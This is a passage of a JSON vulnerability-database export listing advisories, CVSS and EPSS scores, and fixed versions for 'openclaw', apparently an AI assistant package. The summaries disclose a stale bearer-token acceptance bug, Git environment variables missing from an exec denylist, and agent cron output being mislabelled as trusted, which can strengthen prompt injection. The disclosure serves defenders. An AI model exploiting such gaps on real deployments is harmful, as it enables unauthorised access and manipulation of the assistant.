                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41359",
                "GHSA-767m-xrhc-fxm7"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-294z-6z8j-97bx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89628?format=api",
            "vulnerability_id": "VCID-29a1-7ar7-67e1",
            "summary": "OpenClaw: Gateway HTTP endpoints did not re-resolve bearer auth after SecretRef rotation\n## Summary\n\nGateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart.\n\n## Impact\n\nA bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out. On affected versions, the old token stops being accepted only once the gateway process is restarted.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value.\n\nVerified in `v2026.4.15`:\n\n- `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot.\n- `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks.\n- `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43585",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00131",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32235",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00131",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32265",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00143",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34377",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43585"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66651",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66651"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43585",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43585"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xmxx-7p24-h892",
                    "reference_id": "GHSA-xmxx-7p24-h892",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xmxx-7p24-h892"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.15",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"
                }
            ],
            "aliases": [
                "CVE-2026-43585",
                "GHSA-xmxx-7p24-h892"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-29a1-7ar7-67e1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89187?format=api",
            "vulnerability_id": "VCID-2c8p-gbaw-3ye4",
            "summary": "OpenClaw: Isolated cron awareness events were recorded as trusted system events\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nOutput from webhook-triggered isolated cron agent runs could be queued into the main session awareness stream without `trusted: false`. That made the event render as a trusted `System:` event instead of an untrusted system event.\n\nThis is a trust-labeling issue that can strengthen prompt-injection impact, but it does not directly bypass gateway auth, tool policy, or sandboxing. Severity is low.\n\n## Fix\n\nOpenClaw now preserves untrusted labels for isolated cron awareness events and forwards the trust flag through cron delivery helpers.\n\nFix commit:\n\n- `f61896b03cc7031f51106a04566831f4ac2a0bd7`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44999",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04732",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04745",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04761",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44999"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "1.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "1.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "1.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44999",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "1.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44999"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "1.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-57r2-h2wj-g887",
                    "reference_id": "GHSA-57r2-h2wj-g887",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-57r2-h2wj-g887"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "CVE-2026-44999",
                "GHSA-57r2-h2wj-g887"
            ],
            "risk_score": 2.9,
            "exploitability": "0.5",
            "weighted_severity": "5.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2c8p-gbaw-3ye4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90094?format=api",
            "vulnerability_id": "VCID-2h6a-becf-x7ej",
            "summary": "OpenClaw: GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant)\n## Impact\n\n`GIT_DIR` and related Git plumbing environment variables were missing from the exec env denylist (a variant of GHSA-m866-6qv5-p2fg).\n\nAs a result, these variables were not removed before host exec and could redirect Git operations.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.3.30`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41915",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04648",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04661",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04675",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41915"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41915",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41915"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cm8v-2vh9-cxf3",
                    "reference_id": "GHSA-cm8v-2vh9-cxf3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cm8v-2vh9-cxf3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
